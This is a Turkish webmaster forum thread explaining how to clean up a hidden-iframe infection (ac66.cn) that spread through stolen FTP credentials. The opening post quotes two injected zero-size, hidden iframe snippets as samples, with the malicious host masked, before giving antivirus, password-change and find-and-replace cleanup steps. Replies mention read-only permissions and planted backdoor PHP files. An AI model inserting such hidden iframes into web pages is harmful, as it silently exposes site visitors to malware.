İframe Virüsü (Çözüm) - Google Fan Webmaster Forum
Google Fan Webmaster Forum  

Geri git   Google Fan Webmaster Forum > R10 Webmaster Kütüphanesi > Articles
Kayıt ol Articles Sosyal Gruplar Forumları Okundu Kabul Et

R10 Bilgi Arşivi Önemli Bilgilerin ve Paylaşımın Yapıldığı arşivlik konular bölümü. Yaşadığınız sorunu sizden önce birileri mutlaka yaşamıştır.Lütfen ilk buraya göz atın

Cevapla
 
LinkBack Article Tools
  #1  
Alt
Ntie - ait Kullanıcı Resmi (Avatar)
Ntie Ntie isimli üyemiz çevrimdışıdır. (Offline)
<?php?>
Üyelik tarihi: 17-07-2006
Feedback Score: 108 Olumlu
Arrow İframe Virüsü (Çözüm)
yazan Ntie 29-12-2008, 18:00:58

Webmasterların çoğunun baş belası olan iframe (ac66.cn) virüsü olarak bilinen bu virüs ftp'nizdeki bütün dosyalara
PHP- Kodu:
<iframe src='http:/logo/index.php' style='border:0px solid  gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0  SCROLLING=no></iframe
veya
PHP- Kodu:
<iframe src="http://*****.cn/in/" width=1 height=1 style="visibility:  hidden"></iframe
Şeklinde yerleşerek siteye giren kullanıcılara bulaşır.
Bu virüs cuteftp programı ile geldiği öne sürülürken bazı kişiler ise codec gereksimi duyulduğunda bazı programların codec sitelerine yönlendirip virüs indirttiğinide iddaa etmektedir.

Virüs Bir şekilde Bilgisayarınıza bulaştı ve sitenizdeki 2000 tane php veya html dosyanızın içine iframe olarak yerleşti ne yapmanız gerekmektedir. ?

İlk önce bilgisayarınızdan başlamanız gerekmektedir. Bu yüzden Virüs programlarından başlayalm. Önce trojen programını indirin.
Ben kendi kullandığım programları yazacağım.
a-squared'in free versiyonunu kurunuz.


Download
Bu programı kurduktan sonra güncelleştirmelerini yapınız. Ve güncelleştirmeler bittikten sonra türkçe dil desteğide geliyor, dili türkçe yaparak derin tarama seçeneğini seçin ve taramayı başlatın. Çıkan virüsleri temizleyin.
Trojen programından sonra
KasperSky Anti Virüs 2009 Türkçe (30 gün Shareware)


Download

Kurduktan sonra güncelleştirmeleri yapın ve bilgisayarınızı taratın.

Bilgisayardaki virüsleri temizledikten sonra
2. işleme geçiyoruz. Sitenizin paneline girin ve ftp şifrelerinizi değiştirin bu çok önemli çünkü bir kere ftp şifreleriniz kayıt altına alındı ve virüsleri siz temizledikten sonra tekrar geri atabilir. Bu sebeple ikinci işlem olarak ftp şifrenizi değiştiriniz.

3. İşlem Sitenizdeki bütün sayfaları bilgisayarınıza indirin.
Sayfalarınızın hepsinin içerisinde <iframe .... gibi yazılar bulunuyor bu yazıları hepsini tek tek açıp heleki 2500 gibi bir rakamsa editlemek zor olacaktır. Bu yüzden bu kadar uğraşa girmemek için Advanced Find And Replace programını indiriyoruz.



Download (21 gün kullanımlı)

Bu programı genelde spamcılar kullanır ama bizim için çok önemli bir program konumunda şuanda.

Kullanımı resimlerle anlatmaya çalışayım hemen.

Kurulumu yaptıktan sonra programı açıyoruz.
1. işlem




2 işlem


Execute'ye bastığınızda karşınıza bir ekran gelecek ve orda Yes To ALL'ı tıklayın.

Bu işlemlerden sonra ftp'inize dosyalarınızı güvenle atabilirsiniz.
__________________
UYARI :
  • Adsense ve Adwords kupon alım/satış işlemleri yasaktır.
  • 10TL altı itrader gönderimi yasaktır.
Alıntı ile Cevapla


2 kişi bu mesajınızı değerlendirdi 2 kişi faydalı buldu
Görüntüleme 14704 Comments 79
Sponsored Links
Total Comments 79

Comments

  2  
Alt 07-01-2009, 23:30:10
 
Standart

Bunu Cuteftp Açıp Yazılama kapmaklada cözümdür bence.

444 yapdınız zaman yazılıma kapanır ve Hıcbır virus bulaşma tehlikesi olmaz.
__________________
imza Yok Parmak Versek OLarmı ? :D
Alıntı ile Cevapla


  3  
Alt 11-04-2009, 08:47:28
Üyeliği durduruldu
 
Standart

Guzel aciklama, zamaninda tek basima tek tek iframe silmistim.
Alıntı ile Cevapla


  4  
Alt 11-04-2009, 11:16:41
 
Standart

Benim başımada gelmişti aynı olay ben dreamweaver ile silmiştim tüm iframeleri ve dosyaları sonra sadece okunabilir yaptım ftp şifresi değiştikden sonra şimdi öyle bir sorun yok çok şükür. Paylaşım için teşekkürler
__________________
.Net, Css, e-ticaret, wordpress vs işleriniz yapılır.
Alıntı ile Cevapla


  5  
Alt 15-04-2009, 18:43:29
Üyeliği durduruldu
 
Standart

Alıntı:
Buselfa Nickli Üyeden Alıntı Mesajı göster
Guzel aciklama, zamaninda tek basima tek tek iframe silmistim.
aynen
Alıntı ile Cevapla


  6  
Alt 19-04-2009, 19:53:12
 
Standart

arkadaslar joomlada butun dosyaları 444 yapsak upload sorunları falan olmaz mı ? yani bi sakıncası oldugu konu varmı ?
__________________
Allah, helal kazanç yolunda kulunu yorgun görmeyi sever.
Alıntı ile Cevapla


  7  
Alt 19-04-2009, 20:33:05
 
Standart

joomla da sadece configuariton.php mi ne ayar dosyası onu ellemeyin. Sonra admin panelinden genel ayarları değiştirdiğiniz zaman yazılamıyor.
__________________
Forever joomla
Alıntı ile Cevapla


  8  
Alt 19-04-2009, 20:46:44
 
Standart

Teşekkürler İşimize Yarar Bilgi
Alıntı ile Cevapla


  9  
Alt 19-04-2009, 21:34:25
 
Standart

Alıntı:
OLCAYTO85 Nickli Üyeden Alıntı Mesajı göster
joomla da sadece configuariton.php mi ne ayar dosyası onu ellemeyin. Sonra admin panelinden genel ayarları değiştirdiğiniz zaman yazılamıyor.
tmam tesekkur ederım Ne gıcık bişey bu ya
__________________
Allah, helal kazanç yolunda kulunu yorgun görmeyi sever.
Alıntı ile Cevapla


  10  
Alt 19-04-2009, 22:37:38
 
Standart

Alıntı:
TuRan Nickli Üyeden Alıntı Mesajı göster
Bunu Cuteftp Açıp Yazılama kapmaklada cözümdür bence.
444 yapdınız zaman yazılıma kapanır ve Hıcbır virus bulaşma tehlikesi olmaz.

bide bazı virüsler server.php gibi bi php atıyor sunucuya şifre derdi olmadan oradan bağlanarak sürekli editleyebiliyor bu yüzden sunucunuzda gereksiz php leri de incelemek gerekiyo.
Alıntı ile Cevapla


1 kişi bu mesajınızı değerlendirdi 1 kişi faydalı buldu
Cevapla


Bookmarks
tesxc
Article Tools

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Açık



Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 05:18:20.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

“İnsanların en hayırlısı, insanlara faydalı olandır”. H.Ş

Hosting by Radore Hosting

İçerik sağlayacı paylaşım sitelerinden biri olan R10.net WebMaster Forum Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. R10.net hakkında yapılacak tüm hukuksal Şikayetler adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde R10.net yönetimi olarak tarafımızdan gereken işlemler yapılacak ve Avukatlarımız size dönüş yapacaktır.
ARGUS_OK